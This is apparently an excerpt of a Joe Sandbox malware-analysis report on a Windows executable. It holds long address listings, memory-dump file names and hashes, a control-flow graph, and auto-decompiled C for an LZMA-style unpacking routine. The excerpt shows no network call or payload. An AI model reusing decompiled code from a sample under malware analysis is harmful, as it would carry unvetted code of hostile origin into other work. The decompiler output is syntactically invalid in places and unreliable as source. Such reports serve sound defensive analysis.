                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x00000000
                                                  0x00000000
                                                  0x00407395
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x0040739b
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x0040749d
                                                  0x00407458
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407543
                                                  0x00407546
                                                  0x00407447
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x0040744d
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x0040749d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725b
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2
                                                  0x004071e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f44
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00000000
                                                  0x00000000
                                                  0x004070cf
                                                  0x004070cf
                                                  0x004070d3
                                                  0x00407599
                                                  0x00407599
                                                  0x00000000
                                                  0x00407599
                                                  0x004070d9
                                                  0x004070d9
                                                  0x004070dc
                                                  0x004070df
                                                  0x004070e2
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e7
                                                  0x004070ea
                                                  0x004070ed
                                                  0x004070f0
                                                  0x004070f3
                                                  0x004070f6
                                                  0x004070f7
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070fc
                                                  0x004070ff
                                                  0x00407102
                                                  0x00407105
                                                  0x00407105
                                                  0x00407105
                                                  0x00407108
                                                  0x0040710a
                                                  0x0040710a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040734c
                                                  0x0040734c
                                                  0x0040734c
                                                  0x00407350
                                                  0x00000000
                                                  0x00000000
                                                  0x00407356
                                                  0x00407356
                                                  0x00407359
                                                  0x0040735c
                                                  0x0040735f
                                                  0x00407361
                                                  0x00407361
                                                  0x00407361
                                                  0x00407364
                                                  0x00407367
                                                  0x0040736a
                                                  0x0040736d
                                                  0x00407370
                                                  0x00407373
                                                  0x00407374
                                                  0x00407376
                                                  0x00407376
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737c
                                                  0x0040737f
                                                  0x00407382
                                                  0x00407385
                                                  0x00407389
                                                  0x0040738b
                                                  0x0040738e
                                                  0x00000000
                                                  0x00407390
                                                  0x00407390
                                                  0x0040710d
                                                  0x0040710d
                                                  0x00000000
                                                  0x0040710d
                                                  0x0040738e
                                                  0x004075c3
                                                  0x004075c3
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2
                                                  0x004075fa
                                                  0x004075fa
                                                  0x00000000
                                                  0x004075fa
                                                  0x00407447
                                                  0x004074c7
                                                  0x00407490

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                  • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                  • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                  • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 749 407395-407399 750 4073bb-4073c8 749->750 751 40739b-40749d 749->751 753 4073cb-4073e0 750->753 761 4074c7-4074cb 751->761 754 4073e2-4073f8 753->754 755 4073fa-407410 753->755 757 407413-40741a 754->757 755->757 759 407441 757->759 760 40741c-407420 757->760 766 407447-40744d 759->766 764 407426-40743e 760->764 765 4075cf-4075d9 760->765 762 40752b-40753e 761->762 763 4074cd-4074ee 761->763 762->766 768 4074f0-407505 763->768 769 407507-40751a 763->769 764->759 767 4075e5-4075f8 765->767 771 406bf2 766->771 772 4075fa 766->772 774 4075fd-407601 767->774 773 40751d-407524 768->773 769->773 775 406bf9-406bfd 771->775 776 406d39-406d5a 771->776 777 406c9e-406ca2 771->777 778 406d0e-406d12 771->778 772->774 779 4074c4 773->779 780 407526 773->780 775->767 781 406c03-406c10 775->781 776->753 785 406ca8-406cc1 777->785 786 40754e-407558 777->786 782 406d18-406d2c 778->782 783 40755d-407567 778->783 779->761 787 4074a9-4074c1 780->787 788 4075db 780->788 781->772 789 406c16-406c5c 781->789 790 406d2f-406d37 782->790 783->767 791 406cc4-406cc8 785->791 786->767 787->779 788->767 792 406c84-406c86 789->792 793 406c5e-406c62 789->793 790->776 790->778 791->777 794 406cca-406cd0 791->794 799 406c94-406c9c 792->799 800 406c88-406c92 792->800 797 406c64-406c67 GlobalFree 793->797 798 406c6d-406c7b GlobalAlloc 793->798 795 406cd2-406cd9 794->795 796 406cfa-406d0c 794->796 801 406ce4-406cf4 GlobalAlloc 795->801 802 406cdb-406cde GlobalFree 795->802 796->790 797->798 798->772 803 406c81 798->803 799->791 800->799 800->800 801->772 801->796 802->801 803->792
                                                  C-Code - Quality: 98%
                                                  			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
